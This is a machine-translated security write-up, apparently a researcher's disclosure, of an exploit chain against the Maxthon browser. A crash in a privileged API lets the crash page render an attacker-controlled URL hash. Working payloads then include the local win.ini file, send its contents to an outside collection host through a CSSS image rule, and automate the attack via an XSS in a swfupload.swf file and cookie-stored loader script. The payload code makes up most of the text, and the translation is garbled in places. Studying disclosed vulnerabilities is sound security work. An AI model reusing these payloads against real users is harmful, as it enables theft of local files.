Ao you Browser: an error is reported from chicken ribs to local information reading

Ao you Browser: an error is reported from chicken ribs to local information reading
Baidu browser is not updated yet. You can only play with other browsers. When an API is tested, an error is reported when it is run several times. You can also read local files ~~ 1. I did some research on the privileged domain of aoyou and the Functions Represented by Some APIs. When I found the following APIs, I found that there was no response when I entered the parameters based on speculation: (the test was conducted in the console at http:// I .maxthon.cn/domain)

var x=new maxthon.browser.TabService();x.openTabWithHistoryList(["http://www.baidu.com"]);

 

2. However, when I add a null value to the array for speculation, the page is refreshed. The Code is as follows:

var x=new maxthon.browser.TabService();x.openTabWithHistoryList(["http://www.baidu.com",null]);

 

3. when I run the above Code multiple times in the console, such as two null and three null, the following error message appears occasionally: 4. after repeated tests, it has nothing to do with the number of null. As long as the code in step 2 is repeatedly run three times, the browser will see the above crash error message. 5. But this is only a crash, and the exception is captured by the browser, which does not affect the normal operation of the browser. However http://i.maxthon.cn/ Note: if we make the crash happen in http://i.maxthon.cn/ # will XSS be available? 6. Let's try. http://i.maxthon.cn/ # run the [Step 2] Code three times. The following result is displayed: It seems that HTML tags are not filtered, A small image is displayed, but alert (1) is not executed. 7. The first thought is: Will rich text filtering be made here? However, it is unlikely that the tedious solution of "Rich Text filtering" is used in such a location. Where did alert (1) go? So I changed the code a little, http://i.maxthon.cn/ # test with step 6, enable charles to capture packets, and get the following request: 8. this special User-agent: htmlayout 3.3; Windows-7; www.terrainformatica.com) seems to mean something .. Open the GOOGLE search htmlayout on the Baidu browser and find that htmlayout is an HTML-based interface library, and its rendering engine is H-smile, as shown in (Image Source: http://www.terrainformatica.com/wiki/start#htmlayout ): 9. because it is an independent rendering engine, it also means that there is a difference between HTML Tag and script support and our common webkit and other kernels. Therefore, I downloaded an htmlayout sdk, I also checked the supported HTML tags and some functions. 10. Because htmlayout is mainly used for interface display, it supports most common HTML tags and CSS styles and extends HTML tags and CSS. For example, the following is its unique HTML Tag ( http://www.terrainformatica.com/htmlayout/tags.whtm ), Such as include and widget labels: A. include labels can contain sub-pages htm, A bit similar to some of the current HTM template engines, the typical code is as follows:

<include src="document-fragment.html">    <em>Ooops! document-fragment.html is unavailable!</em></include>

 

B. widget tag, similar to a functional <div> tag, supports four different types

<widget type="select"> - select block element;<widget type="dropdown-select"> - dropdown select block element;<widget type="textarea"> - textarea block element;<widget type="htmlarea"> - htmlarea block element.

 

HTMLlayout itself does not support scripts (supported by Sciter), but it supports a technology called CSSS. CSSS is an extended CSS, which can be used to write some simple scripts in CSS, this type of script is mainly related to the display of the interface, but not very functional. For example, the following code (hover-on will be triggered when the mouse moves to the tag! To enable the hover status of the p. slave label and display it in red ):

 
10. Can security problems be caused based on the above? This is what we are most concerned about. It seems impossible to achieve the purpose of executing commands, because there is no relevant tag or API to achieve this purpose. But what about reading local files? Therefore, I first test whether the <include> label can contain local files, for example, <include src = "file: // c: \ windows \ win. ini "/> found that the content can be normally included, as shown in: how can we then send the content to the [Attacker] server? We often get XSS, it is not difficult to think of using new Image (). src = "http://hacker.com /? Sensitive data transmission. As mentioned earlier, htmlayout does not support JS, But it supports csss. After analyzing the csss syntax, we can write the following code to send the included content on the page through the src attribute of the image. The Code is as follows:
<body><widget #test type="htmlarea"><include src="file:///c:\windows\win.ini" /></widget><style>widget#test > text{assigned!:$1(img#xx).src="http://www.baidu.com/?"+self:value;color:red;}</style></body>
 
The CSSS Code indicates that when the text in the widget id = "test" is assigned to the content, set the src attribute of the img id = "xx" to "http://www.baidu.com/" with the assigned content. As a result, we can see the request as shown in: 11. In summary, to exploit this vulnerability, we need to first access the following address:
http://i.maxthon.cn/#<body><widget #test type="htmlarea"><include src="file:///c:\windows\win.ini" /></widget><style>widget#test > text{assigned!:$1(img#xx).src="http://xsst.sinaapp.com/?"+self:value;color:red;}</style></body>
 
Run the following command three times under the address:
var x=new maxthon.browser.TabService();x.openTabWithHistoryList(["http://www.baidu.com",null]);
 
Then, the browser crashes and runs the above Code. ini sent to our server http://xsst.sinaapp.com 12. in order to automate the above process, we first need to find an XSS under the maxthon.cn domain, This is not difficult: http://my.maxthon.cn//public/images/swfupload.swf? Preventswfcaching = 1414769360525 & movieName = aaa "])} catch (e) {alert (1)} // next, we want this page to automatically execute the openTabWithHistoryList three times. The Code is as follows, the first time the Code is stored in window. name, then we put the code into cookies, and the page calls openTabWithHistoryList. After the system restarts automatically, it reads and executes the code again from cookies, and places the code in http: // 192.168.1.13/mx/poc1.js,
<script>window.name='document.cookie="payload='+escape('var s=document.createElement("script");s.src="http://192.168.1.13/mx/poc1.js?"+Math.random();document.body.appendChild(s);')+'; path=/; domain=maxthon.cn";';location.href='http://my.maxthon.cn//public/images/swfupload.swf?preventswfcaching=1414769360525&movieName=aaa"])}catch(e){if(!window.wy){window.wy=1;window.name%26%26eval(window.name);eval(unescape((document.cookie.match(/payload=([^;]%2b)/)||[0,0])[1]))}};//';</script>
 
The http: // 192.168.1.13/mx/poc1.js code is as follows:
// Change the hash (# part) to the code location to be used after the crash. hash = '<body> <widget # test type = "htmlarea"> <include src = "file: // c: \ windows \ win. ini "/> </widget>  <style> widget # test> text {assigned! : $1 (img # xx). src = "http://xsst.sinaapp.com /? "+ Self: value; color: red ;}</style> </body> '; // call openTabWithHistoryList. After three times, the page will crash with the error var x = new maxthon. browser. tabService (); x. openTabWithHistoryList ("http://www.baidu.com", null]);
 
13. Finally, we only need to access the poc page. After the page is refreshed three times with the defect of the openTabWithHistoryList function, a crash error occurs. If the code is executed, the user's local information will be maliciously stolen. Self-built computer: win7 64-bit and maxcompute v4.4.2.2000 In the xp system environment of the virtual machine are successfully tested. Solution: 1. The cause of the crash is unknown and can be fixed. 2. After the crash, the url address displayed on the page is encoded and output.